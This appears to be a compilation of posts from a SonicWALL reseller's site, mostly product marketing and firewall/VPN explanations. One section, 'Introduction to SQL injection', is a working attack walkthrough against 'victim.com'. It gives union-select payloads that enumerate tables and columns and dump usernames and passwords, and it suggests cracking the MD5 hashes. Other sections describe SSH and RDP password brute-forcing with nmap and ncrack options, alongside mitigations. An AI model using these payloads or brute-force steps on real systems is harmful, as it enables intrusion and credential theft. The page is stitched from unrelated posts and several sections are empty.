SSL is a better choice for remote access VPNs than IPsec in the current dynamic landscape which includes a mixture of devices(laptops, smartphones, tablets, etc.) and both managed and unmanaged endpoints.

New remote access VPN deployments should be using SSL-based VPNs. Furthermore, you should consider migrating existing IPsec-based remote access VPNs to SSL ones.

Where to use IPsec-based remote access VPNs

Due to connectivity issues and the requirement of a VPN client, IPsec-based remote access VPNs tend to have a limited usability scope these days; rather suited for a small group of managed endpoints.

For example, can work for advanced users who need network level access(e.g.remote admins) and who connect from locations relatively known(e.g. IPsec is not blocked).

You should consider limiting the use of IPsec-based VPNs mostly for s2s(site-to-site) VPN connections.

Since then, application developers have worked around these firewall blocks by simply allowing their applications to run over the ports that are open on the firewall (e.g. HTTP).  This new approach to "bypassing the firewall" has generated a new technology called application intelligence.  With this new technology firewalls are now able to examine the traffic running through these open ports and identify the actual application using it.  In turn, this provides the firewall administrator with the ability to allow or deny access to these applications.

In the follow video we walk you through a demonstration of how this technology works at identifying the applications.

A typical corporate firewall sits at the edge acting as a transit point between untrusted zones(like the Internet) and trusted ones(like your internal network); furthermore it can provide network separation between some internal zones(e.g. LAN servers and LAN users).

Gateway antivirus issues

Traditionally vendors offered UTM(Unified Threat Management) gateways with antivirus/antimalware scanning capabilities. Organizations can be somehow unhappy with these due to various issues.

• Performance degradation; as the security services are turned on(antivirus, IPS, etc.) on the UTM performance drastically drops and users start to experience latency accessing the needed resources.
• Large files scanning issues; to avoid performance issues, many vendors only scan small files.
• Limited protocols coverage; only a few popular protocols(like HTTP, FTP) are scanned for malicious traffic.
• Limited visibility; encrypted traffic(typically SSL traffic, e.g. HTTPS) cannot be inspected, malicious traffic slipping through.
• Small threats signature database; given the increasing number of viruses, worms, etc., with a traditional database of signatures is hard to get a decent level of protection.
• Limited inter-zone scanning flexibility; as depicted above the firewall separates many zones and all traffic needs to be inspected not just the one between the Internet and the internal network.

SonicWALL Next Generation Firewall(NGFW) and its gateway antivirus inspection(GAV)

SonicWALL NGFW is designed to deal with the above mentioned issues by incorporating certain key features.

• High-performance scanning engine to deliver real-time gateway anti-virus scanning; the SonicWALL Reassembly-Free Deep Packet Inspection engine scans unlimited file sizes, and hundreds of thousands of concurrent downloads in real time.
• Broad protocol coverage; supports popular protocols such as HTTP(meaningless of port), FTP, SMTP, POP3, IMAP, NetBIOS or IM and P2P plus the scanning of generic TCP streams for viruses.
• Encrypted traffic scanning; the GAV utilizes SonicWALL's Deep Packet Inspection of Secure Socket Layer (DPI-SSL) to inspect encrypted HTTPS traffic and other SSL-based traffic.
• Cloud Anti-Virus Database; the cloud Anti-Virus database contains millions of signatures dynamically updated.
• Great inter-zone scanning flexibility; traffic between many security zones can be scanned.
• Compression support; SonicWALL NGFW is capable of decompressing HTTP traffic compressed with gzip or deflate methods. Also SMTP, POP3 and IMAP protocol scanning options include base64 decoding, zip(including archives) and gzip decompression capabilities.
• Additional features; password protected ZIP archive files, various packed executable files, and Microsoft Office documents containing Macros can be prohibited.

Summary

Gateway antivirus inspection can add an additional layer of protection against today's threats like malware or viruses. SonicWALL NGFW is able to perform gateway antivirus inspection over many protocols(including encrypted ones) with no file size limitations and without introducing performance issues.

Deploying a new firewall into a network can be a complicated process due to various issues(e.g. IP address reconfiguration, network topology changes, current firewall, etc.). In an attempt to help enterprises deal with these, firewall vendors came up with “drop-in” solutions.

When it comes to SonicWALL firewalls and SonicOS Enhanced, the Transparent Mode and L2 (Layer 2) Bridge Mode have different meanings.

SonicWALL Firewalls in Transparent Mode

A mode that allows a SonicWALL firewall(running either SonicOS Standard or Enhanced) to be inserted into an existing network without the need for IP reconfiguration by spanning a single IP subnet across two or more interfaces.

• No re-addressing of any portion of the network including the gateway router; hosts on the Transparent Interface must be specifically declared.
• Two or more interfaces can be used.
• Operates at Layer 3.
• Handles only IPv4 traffic; transparent Mode will drop (and possibly log) all non-IPv4 traffic.
• Broadcast traffic is dropped and logged( exception would be NetBIOS which can be handled by the IP Helper).
• Multicast traffic, with IGMP dependency, can be inspected and passed.
• By default, traffic will not be NAT-ed from/to the WAN to/from Transparent Mode interface, but it can be NAT-ed to other paths, if needed.
• Stateful Packet Inspection and all security services (GAV, IPS, Anti-Spy, CFS) are supported.
• DHCP services can be provided by interfaces operating in Transparent Mode, or these can pass DHCP using the IP Helper.
• VPN operations are supported with no special configuration requirements.
• The firewall acts as a Proxy ARP, proxying ARP requests on behalf of specified internal hosts(servers, workstations, etc.) and router gateway respectively; that is, as per bellow image, the internal hosts see the gateway router MAC address as SonicWALL’s internal interface MAC address, while in reverse, the gateway router sees the internal hosts MAC addresses as SonicWALL’s external interface MAC address.

SonicWALL Firewalls in L2 Bridge Mode

A mode that allows a SonicWALL firewall(running SonicOS Enhanced) to be inserted into an existing network without the need for IP reconfiguration similar with the Transparent Mode but providing more transparency(the firewall acts as a Layer 2 bridge) and versatile functionality.

• No re-addressing of any portion of the network including the gateway router; hosts on either side of a bridge are dynamically learned.
• Maximum two interfaces can be used for the same subnet.
• Operates at Layer 2.
• Handles all traffic; including IPv4 or IPv6 traffic, STP(Spanning Tree Protocol) and unrecognized IP types.
• Broadcast traffic is passed from the receiving Bridge-Pair interface to the Bridge-Partner interface.
• Multicast traffic can be inspected and passed across L2 Bridge-Pairs.
• By default, traffic will not be NAT-ed from one Bridge-Pair interface to the Bridge-Partner, but it can be NAT-ed to other paths, if needed.
• Stateful Packet Inspection and all security services (GAV, IPS, Anti-Spy, CFS) are supported.
• VPN operations are supported with no special configuration requirements.
• DHCP services cannot be provided in this mode, but DHCP can be passed through a Bridge-Pair.
• The firewall passes ARP requests through natively; that is, hosts communicating across the L2 Bridge will see the actual MAC addresses of their peers.

When to use Transparent Mode and when to use L2 Bridge Mode

Summary

The two modes of operation of SonicOS Enhanced, Transparent and L2 Bridge, allow drop-in deployment solutions of SonicWALL firewalls.

They enable enterprises with no immediate plans of current firewall replacement to benefit from UTM security along with a smooth migration path to full security services operation.

Admin Tools for SonicWALL is a exclusive collection of training, troubleshooting and performance enhancing tools for SonicWALL firewalls. These tools are provided for free to Firewalls.com customer who purchase any SonicWALL firewall for their network or customers.

• Training Videos to help you configure and secure your firewall.
• Audit your firewall for security and performance enhancements.
• Document your firewall for auditors, customers and backup.
• Performance testing tools to maximize throughput speed.
• Plus many more tools being added ...

The NSA 220 and 250M Series offer firewall protection with tightly integrated intrusion prevention, comprehensive gateway anti-malware services and granular application intelligence and control. Both appliances are available as dual-band wireless models. The NSA 250M Series also supports a variety of modules such as T1/E1, ADSL (Annex A & B), 2GbE SFP and LAN Bypass to further expand its deployment flexibility and reduce maintenance costs through equipment consolidation.

As well as providing extensive security for branch offices without degrading performance, the new appliances allow administrators to manage the unproductive use of network resources such as social media applications that eat away at precious network bandwidth and company resources if left unchecked. For example, a network administrator can allow the marketing team to reach out to customers via Facebook while restricting social and browser gaming during business hours.

"In distributed environments with multiple branch offices, the security at the periphery must be as good as the security at the core," said Dmitriy Ayrapetov, product line manager network security at SonicWALL. "With the introduction of the NSA 220 and 250M, branch offices now have full deep packet inspection security for their entire network, including SSL-encrypted traffic while being able to take control of all the applications on their network. SonicWALL is the only company to deliver this scanning capability in this class of products."

The NSA 220 and 250M Series appliances offer advanced application traffic analytics to provide granular insight into application traffic, bandwidth utilization and security threats for troubleshooting and forensics, both in a real-time view on the firewall and a historic view through syslog, IPFIX and NetFlow exported data. Additionally, the NSA 220 and 250M tightly integrate with SonicWALL's recently announced WAN acceleration appliances, reducing network traffic and latency between remote offices.

Key Features of SonicWALL NSA 220 and 250M Series

The SonicWALL NSA 220 and 250M Series high-performance next-generation firewalls provide distributed enterprises and branch offices alike with in-depth frontline security, as well as application and user control without compromising on network performance.

SonicWALL Reassembly-Free Deep Packet Inspection™ (RFDPI)(1) engine protects against malware such as Trojans and worms, and segments out credit card transaction traffic as mandated by PCI DSS regulations. Unlike other scanning engines, the RFDPI engine is not limited by file size or the amount of concurrent traffic it can scan.

SonicWALL Application Intelligence, Control and Visualization enables IT to granularly view and control bandwidth-consuming and potentially dangerous application traffic over the network, even between widely distributed locations.

SonicWALL Clean Wireless™, optionallyintegrated into dual-band wireless models or via SonicWALL SonicPoint wireless access points, provides powerful and secure 802.11a/b/g/n 3x3 MIMO wireless, and enables scanning for rogue wireless access points in compliance with PCI DSS.

SonicWALL Clean VPN™ provides integrated secure remote access via site-to-site IPSec VPN or granular, easy-to-use SSL VPN.

SonicWALL WAN Acceleration, enabled by the SonicWALL WXA Series, increases file transfer speeds between remote branch office sites and drives secure network optimization.

Integrated modules support (on NSA 250M and NSA 250M-W Series appliances) reduces acquisition and maintenance costs through equipment consolidation, and adds deployment flexibility with support for SFP, T1/E1, ADSL (Annex A & Annex B) and LAN Bypass modules.

Availability

SonicWALL NSA 220 Series is available immediately.

When it comes to choosing a firewall solution many enterprises are faced with a dilemma: to go the open source way or the “traditional” firewall vendors way.

At a glance the open source way is appealing being often associated with the words free and customization. One can build from scratch a firewall based on various Linux distros or BSD versions. Alternatively open source firewall distributions are available, free or commercial versions(like pfSense, SmoothWall, etc).

Also at a glance, the firewall vendors way is appealing as it offers robust solutions(e.g. SonicWALL with its Next Generation Firewall). An obvious contrast with the open source is the free word, especially if compared with entry-level UTMs like pfSense.

The free aspect

Are the open source firewall distributions really free?
No, not really.

Also while there are free versions of commercial distros(e.g. SmoothWall Express), these include limited features providing little protection for enterprises.

The customization aspect

Requires a capable staff which many organizations do not have(extra costs) and great care with a firewall distro(it is possible that various updates to wipe out or broke custom modifications); increased TCO.

The current threat landscape

In today’s world most of attacks take place at the application level, especially web-based attacks are prominent and organizations struggle to control the use of feature-rich Web 2.0 and not only applications. Stateful packet inspection is no longer sufficient. The focus is on controlling and managing users’ applications(not just block them) and achieve mitigation at the gateway level against blended threats.

Going head to head

Summary

For protection against today’s real world threats there is no free solution. Open Source Firewall Distributions like pfSense can provide a decent level of protection when used with commercial features, but cannot match the high level of protection offered by a NGFW.

Symptom:

SonicOS management SessionID brute force vulnerability when attempted from the same source IP as a legitimate administrator's active management session.

Fix / Workaround:

Occurs when the brute force attacker finds the legitimate SessionID, which is valid for use onlyfrom the source IP of the legitimate administrator during an active session, from one of4,294,967,296 possible SessionIDs (a session is active between the time legitimate administrator logs on and off). The SessionID security enhancement requires the attacker to guess the legitimate SessionID from one of 340,282,366,920,938,463,463,374,607,431,768,211,456 possible SessionIDs, and therefore requiring an attack on an active administrative session, from the same source IP of the administrator, to last 2,697,570,767,701,495,615,277,217,349,632 years.

How to Download:

IF you have an active support agreement you can download the latest firmware from you http://www.mysonicwall.com account.

Need to Renew Your Support Subscription

If you SonicWALL support subscription has lapsed you can renew it today.

Attackers use client-side attacks to gain access to critical assets and information. They do so by finding and exploiting vulnerabilities in client-side software or by employing social engineering techniques. High profile breaches, e.g. the Google or RSA incidents, involved client-side attacks.

Why not breach the perimeter?

Internet exposed services may be placed in hardened perimeters; attacking them and pivoting till the internal network is reached might not be such a simple option for attackers.

Client-side a weak appealing link

Workstations are different than servers; they ran many third-party applications. Keeping up-to-date all the software installed on users’ machines is a problem(especially when some not even include an update manager). All unpatched or outdated software can serve as attack vectors that may allow remote code execution.

How the attack is served?

There are a couple of possibilities, exploiting vulnerabilities(including 0-day vulnerabilities) or not.

• Email; a malicious link or payload(e.g. attached Word or PDF documents) is sent into an email that looks legit. The link might be hosted on a compromised popular site.
• Web site; serving the malicious payload from a compromised site that the user normally visits.
• Social engineering; no vulnerabilities are needed to install the malicious software, attackers convince the users to install it through various techniques, e.g. rogue antivirus, computer speed boost software, etc. Instant messaging might be involved and users convinced to accept an upload containing a malicious executable that they will run.

Aftermath

After the user’s machine is compromised, attackers, if needed, escalate privileges and map the internal network. They will use the machine as a pivot to attack and compromise other machines till they reach their target(s).

Once inside, if careful enough, attackers can stay undetected for months or years.

Mitigations

It’s not a simple task to fight such attacks. Mitigations include client-side, user-side, penetration testing, secure internal network design and network egress/ingress filtering measures.

• Client-side: establish a baseline of monitoring, patching and updating installed software.
• Client-side: install centrally managed security protection suites(HIPS, AV, FW).
• Client-side: use GPO to restrict users’ privileges and control the installation of software.
• User-side: training programs to raise users’ awareness and education.
• Penetration testing for client-side; normally pen test are done against services exposed to the Internet to identify vulnerabilities(e.g. web services vulnerable to SQLi, XSS, CSRF, etc.). Same can be done to identify client-side vulnerabilities and their level of exploitability.
• Secure internal network design; some use a flat internal network design(no or little separation, either physical or logical), assuming that since this is not directly reachable from the Internet is somehow secure.
• Network egress/ingress filtering measures: email filters(content, spam, AV) to block potential dangerous emails reaching users’ inbox.
• Network egress/ingress filtering measures: use NGFW like the SonicWALL E-Class NSA series to proactively control and gain visibility into users’ applications traffic instead of filtering per protocol/port. Additionally such firewalls include modern IPS with client-side attacks prevention capabilities, gateway AV and antimalware engines to identify and block possible malware entering the network along with bandwidth monitoring that helps you detect massive data/information leakage.

Summary

Client-side attacks are not something new and get better and better as time goes by now that the perimeter is hardened. They are no longer centered on OS(e.g. Microsoft Windows) and target many third-party applications. If not taken into serious consideration, they can lead to a total internal network compromise.

Historical and Real-Time Forensic and Visual Analytics Transform Network Protection, Management and Productivity

SonicWALL Inc. announced the launch of its Application Traffic Analytics software suite. This next-generation solution consists of SonicWALL Global Management System (GMS) 7.0, Analyzer and Scrutinizer and provides enterprise IT managers with unparalleled insight into real-time and historical network bandwidth utilization, application traffic, security threats and employee productivity. The new Application Traffic Analytics solutions suite provides powerful visualization into the network to assist administrators with troubleshooting and ease with overall network management.

The ability to deliver historical and real-time forensic insight into application and data traffic flowing through a network enables IT managers to better predict, prepare, respond to -- and avoid -- bandwidth spikes. It also helps manage security threats, inappropriate application usage and network outages. The SonicWALL suite of Application Traffic Analytics solutions improves network management and helps drive ROI and business productivity by ensuring business-critical service-level and compliance requirements are consistently met.

For enterprises, the SonicWALL Application Traffic Analytics solution combines a SonicWALL Next-Generation Firewall and either the SonicWALL GMS 7.0 or SonicWALL Scrutinizer. For small- to medium-sized businesses, the SonicWALL Application Traffic Analytics solution combines a SonicWALL Next-Generation Firewall and either SonicWALL GMS 7.0 or SonicWALL Analyzer. SonicWALL's Next-Generation Firewalls with the Reassembly-Free Deep Packet Inspection™ (RFDPI) engine provide the rich data source that is then utilized by these tools to give users unmatched deep real-time and historical insight.

"Network administrators are under continual pressure to minimize costs and optimize network capital investment, while facing exponential growth in business applications, digital content and network growth. 50% of companies surveyed by industry analyst firm Forrester Research said at least 30% of their bandwidth is being consumed by social networking traffic.(1) Being able to truly visualize, prioritize and protect network traffic flow is a business critical requirement," said John Gmuender, vice president of engineering and CTO of SonicWALL. "By utilizing the network security SonicOS platform that leverages the unique capabilities of our RFDPI engine, our new suite of Application Traffic Analytics gives the ability to eye-ball and analyze historical and real time data and application flow. By delivering granular hindsight, we give our customers the foresight to better plan and manage the corporate network in a way that translates directly to the bottom line through enhanced network performance, security and ROI."

Said Michael Crean, CEO of Solutions Granted, Inc., a solution-based information technology firm specializing in complete managed services, network development and security, "SonicWALL's new application traffic analytics allow us to have more meaningful business discussions with our customers. For example, we can show in detail which applications are used most in a given day, month or year and which applications are a legitimate use of their network infrastructure and their employees' time. This level of visibility and analytics helps us help our customers enhance their ROI and productivity."

The SonicWALL suite of Application Traffic Analytics includes:

SonicWALL Scrutinizer: a multi-vendor, application traffic analytics visualization and reporting tool that measures and troubleshoots network performance and utilization while increasing productivity for enterprises and managed service providers. Granular visualization and analytic reporting capabilities include deep packet analysis, jitter/latency monitoring, automated reports and customizable dashboards. Scrutinizer also provides advanced analysis, historical and advanced reporting, role-based administration and threshold-based alerts. Of particular value to MSPs and ISPs are granular role-based access controls, scheduled over-usage data exports for billing and invoicing and customizable style sheets for branding. SonicWALL Scrutinizer supports a broad range of routers, switches, firewalls, and data-flow reporting protocols from a wide variety of vendors. Scrutinizer provides critical insight into application traffic analysis from IPFIX/NetFlow data exported by SonicWALL firewalls.

SonicWALL Global Management System (GMS) 7.0:

The SonicWALL Global Management System enables organizations of all sizes to globally manage, monitor and report on up to thousands of remote SonicWALL appliances.

Features include:

• Centralized security and network management to help deploy and manage a distributed environment
• Universal dashboard features customizable widgets, geographic maps, and user-centric reporting
• Real-time and comprehensive policy and compliance reporting across thousands of SonicWALL firewalls
• Streamlined license management from a single console
• Centralized logging, providing a single point for conducting network forensics
• Next-generation syslog reporting that streamlines time-consuming summarizing incoming syslog data
• Custom reporting and activity visualization with extensive drill-down capabilities for per user reporting on application usage, websites visited and blocked, backup activity and remote user connectivity
• Extensive cross-platform reporting for numerous SonicWALL products, including Firewalls, Anti-Spam, Backup and Recovery (Continuous Data Protection) and Secure Remote Access (SRA) platforms
• Active-device monitoring and alerting enable preventative action and deliver immediate remediation
• SNMP support provides, real-time traps for all TCP/IP and SNMP-enabled devices and applications, enhancing troubleshooting to pinpoint and respond to critical network events

SonicWALL Analyzer: includes most of the new reporting features available in GMS 7.0 but is targeted at the smaller SMB network. Analyzer is an easy to use web-based tool that provides both real-time and historical application traffic analytics and security event reporting to IT administrators with extensive drill down capabilities to analyze the performance and security of their networks. Analyzer supports SonicWALL firewalls, backup and recovery appliances, and secure remote access devices while leveraging application traffic analytics for security event reports. Reports include: Real-time and historical traffic analysis, comprehensive graphical reports, user centric reports, next-gen syslog reporting, Secure Remote Access (SRA) and Continuous Data Protection (CDP) event reporting and universal scheduled reports.

Pricing and Availability

SonicWALL Scrutinizer is available immediately. Pricing starts at a list price of US$3,495.

SonicWALL Analyzer and SonicWALL Global Management System Version 7.0 will be available in November 2011.

Analyzer will start at a list price of $125 for TZ Series products. Pricing for GMS remains unchanged.

INTRODUCTION TO SQL INJECTION

SQL injection exploits vulnerabilities that exist in a web application. This technique can be used to gain access to web servers, extract, modify databases, information and run commands remotely.

HOW DOES IT WORK?

SQL injection exists due to carelessness of the web application programmer. The technique involves inserting or “injecting” SQL queries into user input areas such as textboxes, address bar etc. If the web application does not sanitize the inputted data properly, it will end up running the query and displaying the results to the attacker.

WHAT IS AT STAKE?

A vulnerable website could give away all of its information stored in databases including mailing lists, customer information, usernames and passwords. That’s not all though, advanced SQL queries allow remote code execution and file system access on the server, giving an attacker complete control over the machine. Bypassing all other security measures one may have setup.

AM I VULNERABLE?

To test if your site is vulnerable first surf a bit around until you find a URL like this:

www.victim.com/index.php?id=1
or
www.victim.com/index.php?page=news

What we are interested in is “id=1” or “page=news” or anything like that.
Once you have found such a page simply put a “ ’ “ before the last digit or word.

www.victim.com/index.php?id=’1
or
www.victim.com/index.php?page=’news

Now reload the page, if you get an error like

Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in D:\inetpub\victim.com\index.php on line 10

This implies that the website is indeed vulnerable. The single quote ‘ that we injected tells the server that this is the start of an SQL query. The error confirms that it tried to run a blank query.

FIRST STEPS

The first step is to identify the number of columns in the database. To do so we will use the order by attribute.

www.victim.com/index.php?id=1 order by 1--
Reload the page (don’t forget – at the end), if all goes well, the page will load normally (no errors). Change the “1” to “2” and hit again.

www.victim.com/index.php?id=1 order by 2--
Keep doing this (incrementing) until we get an error. So for example if

www.victim.com/index.php?id=1 order by 6--
generated an error, this would mean we have 5 columns.

Next, we need to find the column that is vulnerable. Use the following query for this purpose.
www.victim.com/index.php?id=1 union select 1,2,3,4,5--

Include all the columns that you found (I’m assuming 5 in this case). When you load this, a few numbers should appear. Assuming I got 2 and 4. This means column 2 and 4 are both vulnerable.

SQLi IN ACTION

The anatomy of an SQLi hack can be summed up as:

1. Find the database version

www.victim.com/index.php?id=1 union select 1,@@version,2,3,4,5--
Replace any of your vulnerable column number with @@version and reload.

2. Find database name

www.victim.com/index.php?id=1 union select 1,concat(database()),2,3,4,5 from information_schema.schemata--
Replace @@version with concat(database()) and add from information_schema.schemata at the end.

3. Find Table names

www.victim.com/index.php?id=1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()--
When you run this, you will get a list of all the tables in the database.

FINDING INTERESTING TABLES

There is a high probability of finding tables like usertbl or logintbl. Usually you will find tables with user names and passwords (encrypted mostly), transactions, mailing lists, orders etc.

Each table has some columns. Columns contain the data. For example, usertbl table could have the columns username, password, id.

Use this syntax to view columns available.

www.victim.com/index.php?id=1 union select 1,group_concat(coloumn_name) from information_schema.columns where table_schema=database()--

This will print available columns on the webpage. Assuming you found a table with login credentials, use this syntax to get the data.

Replace databasename and tablename with appropriate ones.
www.victim.com/index.php?id=1 union select 1,group_concat(username,0x3a,password,0x3a,id) from databasename.tablename--

Sample Output:

The passwords are encrypted by MD5 algorithm. Use www.hashcrack.com to decrypt it into plaintext.

SonicWALL NetExtender

The SonicWALL NetExtender is a SSL VPN client that provides network level access to resources, services and applications on the corporate network. The connectivity experience is virtually identical to that of a traditional IPSec VPN client, but NetExtender does not require any manual client installation.

The client is transparently downloaded from the SSL VPN portal and installed on the users' machines, either with ActiveX controls for Internet Explorer users, with the XPCOM plugin for Firefox users or with Java controls on Linux or Mac OS X systems for supported browsers. The NetExtender client will create a connection profile recording the SSL VPN gateway address, the Domain name and optionally the username and password.
NetExtender has broad platform(including mobile devices) and operating systems support(Windows, Linux or Mac OS X).

SonicWALL Global VPN Client

The SonicWALL Global VPN Client is an IPsec-based VPN client that provides users with an enhanced traditional client-based VPN experience. It includes easy-to-follow wizards to help users install and configure a VPN connection. The users enter the domain name or IP address of the SonicWALL VPN gateway and the Global VPN Client configuration policy is automatically downloaded.

The connection is robust as the VPN session reliability feature allows the Global VPN Client to support redundant SonicWALL VPN gateways to ensure mission-critical network access in the event the primary gateway fails.

SonicWALL VPN Clients Features

To save your money, you can just give us a call on 866.403.5305 and let us know how many years of subscriptiuon do you want. (this option is not available through normal published price list)

4, 5 and 6 years 24x7 support is available for the following models:

SonicWALL Can Help

Built into the SonicWALL CGSS (Comprehensive Gateway Security Suite) you can protect your network from 2 different angles. They are:

1) Block Connections to/from known botnet control servers - With a single click your SonicWALL will watch for and stop any attempts to connect with a botnet server. Further more, the built in reporting will tell you exactly which PC on the network has the bot install so you can get it cleaned up.

2) Block Connections to/from Countries - With this feature you can prevent connections to and from servers outside of your local country. This helps control what servers your network users can connect to and helps block botnet servers that may have yet to be discovered.

How it's Done

Watch this video on how you can easily implement this feature on your SonicWALL firewall.

Additional Resources:

SonicWALL Firewalls
SonicWALL CGSS - Comprehensive Gateway Security Suite

Requirements for this video

(1) SonicWALL Firewall - TotalSecure Series

(1) SonicWALL SSL DPI upgrade option

Here is How it is Done:

Information gathering is used by attackers or pen testers to gain information about target systems.
Active information gathering is accomplished by interacting directly with the targets to learn more about them. Interaction is done as carefully possible to avoid detection(of the activity or intentions).

Tools

Nmap is one of the most popular scanners used for active information gathering.
An alternative to it is Metasploit and its auxiliary modules, particularly its scanners.
From ARP scans, SYN scans to various service scans(HTTP, SQL, SMB, SSH, etc.) can be performed with Metasploit’s scanners.
You can see the available scanners within Metasploit’s console using the search auxiliary ^scanner command.

Putting to work Metasploit’s scanners

We will use the scanners to detect any live targets located on the same subnet with us, to perform a port scan against these machines and to identify the services running on the found open ports.

Metasploit ARP scanner

We can enumerate systems located on the same network as our machine by performing an ARP scan.
We start by instructing Metasploit to use the ARP scan module; to view a module’s option use the show options command.

We can set the THREADS value to a higher number in order to improve the speed of scanning(or to a lower one if we want to be quiet); type the run command and hit enter to perform the scan.

Metasploit port scanner

Metasploit service identification

Conclusion

One popular usage of SSH is to allow users to access a command shell on a remote computer for administrative purposes. It’s often used for the administration of Linux-based systems, routers or firewalls. The latest version of SSH is 2; normally TCP port 22 is used by it.

Issues with SSH

Normally SSH provides encryption for data, public key authentication for the server and password authentication for users(username and password are also encrypted within the SSH session); public key authentication is also possible for users.

• Although considered a bad practice, administrators exposed SSH services to hostile networks(like the Internet), allowing root login over SSH with password based authentication.
• Using a weak password for the root account could lead to a total system compromise as the root credentials can be determined through brute force attacks.

Anatomy of automated SSH brute force attacks

SSH brute force attacks can be automated or targeted. Here is a typical example of an automated attack.

• Attackers scan for SSH daemons exposed to the Internet.
• The scans can be done by bots; usually automated scans target the regular SSH TCP 22 port.
• Assuming the TCP port 22 is found open, service identification is attempted.
• SSH banners can expose info about the SSH service(like OpenSSH version) and the underlying OS(like Debian Linux).
• Based on the information gathered attackers try to discover valid username and password combinations through SSH brute force attacks; these are not quite brute force attacks, rather they use weak passwords dictionaries.
• A prime target will be the root account.
• If root login over SSH is allowed with a weak password, attackers may end up in complete control of the exposed system.

Demonstrating a SSH brute force attack

Auditing a SSH daemon exposed to a hostile network can be done using tools like nmap and ncrack.
With nmap we scan for open SSH ports and discover details about the services running on those ports.
With ncrack we attempt to perform a brute force attack against the discovered SSH server.
Both tools are available on the latest BackTrack penetration testing distribution which we will use it below.
nmap in action

• First we attempt to determine if TCP port 22 is open on the target machine; we will use a nmap half-open or stealth scanning.

• Next we will perform a service scan to find out if the SSH port is used by a SSH daemon; and if yes, to obtain more info about the SSH daemon. From below we can spot that OpenSSH listens on the TCP port 22 and that the underlying OS might be Debian.

• We can use nmap to obtain more info, but for the moment let’s pretend we are happy with what we know.

ncrack in action

• ncrack comes with its own list of password dictionaries; the ‘default.pwd’ dictionary is used unless we specify another one. We will attempt to determine if the user root is allowed to login over SSH with a weak password; we will instruct ncrack to quit trying(-f option) after it founds the root password, the -d option specifies the level of debugging(7 below).

Mitigations against SSH brute force attacks

There are a couple of mitigations against SSH brute force attacks.

• One of the most efficient mitigation is to not expose the SSH daemon to hostile networks; use VPN to access SSH. For example with a SSL VPN is easy to securely publish SSH servers for your users.
• If you need to leave directly exposed to the Internet any SSH server use public key authentication for user authentication and disable regular password authentication.

If public key authentication for users is not possible, attempt to mitigate brute force attacks through a combination of methods by:

• using strong passwords and not allowing root login over SSH(it’s better to have a separate account for regular use and to sudo to root when needed). Changing the default SSH port might help in some cases of automated attacks when only the default TCP port is probed.
• using a firewall/IPS in front of the SSH server to limit the number of TCP simultaneous connections a client can open against your SSH server and to raise an alert when the threshold is reached.
• detecting with an IPS signature attempts of SSH credential guessing attacks(note that since the username and password are encrypted within the SSH session, it is impossible to determine if actually password guessing attacks are occurring, rather an excessive number of SSH connections made to an SSH server within a specified timeframe will be detected by the IPS).

Summary

Yesterday Threatpost reported a story [1] about a new worm called Morto targeting Microsoft Remote Desktop services (RDP) that is making waves on the Internet.

For the moment, according to Microsoft [2], the worm is using a list of passwords for the default administrator user name to attempt to gain access to a system. On the compromised machine a couple of files are installed. Then the worm will cycle through the IP addresses on the compromised computer's subnet attempting to connect with RDP to other local RDP servers as described above.

Some feared the attack vector was an exploitable vulnerability of Microsoft's RDP. Right now this not seems to be the case. Weak passwords are the culprit.
It's not clear what authentication version Morto can use, if it supports Network Level Authentication or not.

Vulnerability scan

The ncrack tool[3] can be used among others to test your environment. To use the list of passwords found on MS page [2], simply create an empty .txt file and copy and paste within this file the passwords from MS' page and feed this file into ncrack with the -P option.

Or use the --pass option to specify these passwords comma separated.
A couple of ncrack options:

• --user option: used to specify your own usernames directly in the command-line as a comma-separated list.
• --pass option: used to specify your own passwords directly in the command-line as a comma-separated list.
• -P option: used to specify the password file; defaults to default.pwd.
• -U option: used to specify the usernames file.
• -f option: specifies to quit cracking after one found credential.
• -d7 option: sets the debugging level to 7; up to 10 is meaningful.
• -v or -vv option: sets the verbosity level.
• CL option: specifies the connection limit; 1 must be used against Windows XP machines.

Example of command against a Windows Vista machine using the list of passwords from Microsoft's page[2].

Mitigations

This worm right now takes advantage of weak password.
So:

Don't use weak passwords on your RDP servers; use GPOs to prevent this. Don't leave directly exposed to the Internet any RDP servers; use VPN to access RDP. For example with a SSL VPN is easy to securely publish RDP servers for your users. A possible DoS condition exists if you exposed your RDP servers directly to the Internet; use an IPS or a firewall with anti-DoS capabilities in front of them to limit the incoming number of concurrent TCP connections.

References

[1] New Worm Morto Using RDP to Infect Windows PCs
https://threatpost.com/en_us/blogs/new-worm-morto-using-rdp-infect-windows-pcs-082811
[2] Worm:Win32/Morto.A
http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Worm%3AWin32%2FMorto.
[3] ncrack
http://nmap.org/ncrack/
http://nmap.org/ncrack/man.html

How to Successfully Buy & Renew Your CGSS Service

	Step 1: How to Install Your License It is important that you know how to properly activate your subscription. We have created a handy video that will walk you through that process.
	Step 2: Select Your License Below, you will find a list SonicWALL models that support the CGSS service. Simply select the model that you own. You will then be presented with the option to buy either the 1,2 or 3 year license.

Select the Firewall Model You Have:

SonicWALL TZ Series Security Suite
SonicWALL TZ 100	SonicWALL TZ 150	SonicWALL TZ 170	SonicWALL TZ 180
SonicWALL TZ 190	SonicWALL TZ 200	SonicWALL TZ 210

SonicWALL PRO Series Security Suite
SonicWALL PRO 1260	SonicWALL PRO 2040	SonicWALL PRO 3060	SonicWALL PRO 4060
SonicWALL PRO 4100	SonicWALL PRO 5060

SonicWALL NSA Series Security Suite
SonicWALL NSA 240	SonicWALL NSA 2400	SonicWALL NSA 3500	SonicWALL NSA 4500

SonicWALL E-Class NSA Series Security Suite
SonicWALL NSA E5500	SonicWALL NSA E6500	SonicWALL NSA E7500

Distributed Denial of Service (DDoS) attacks are undeniably the most dangerous and devastating known in network security. Usually these attacks are targeted on high profile web servers; Yahoo, eBay, PayPal and many others have been targeted in the past.

What is the attack?

DoS attacks are basically packet storms that are targeted over to the victim. The victim following regular protocol keeps replying to spoofed requests until all of its resources are saturated resulting in a Denial of Service.

Why Distributed?

Hackers use different mechanisms to first gain an army of compromised computers called zombies. These zombies can then be commanded by the hacker to flood the victim.

To capture and infect machines, hackers scan an address space for a known vulnerability. Identified machines are infected by installing the program.

Typical architecture of a DDoS attack involves a handler. Handler is an infected machine that controls hundreds of zombies. Once the attacker has enough zombies, he can take down anything. Some of the recent attacks have seen paid Cloud Computing services being used for the purpose.

Defense

Firewalls

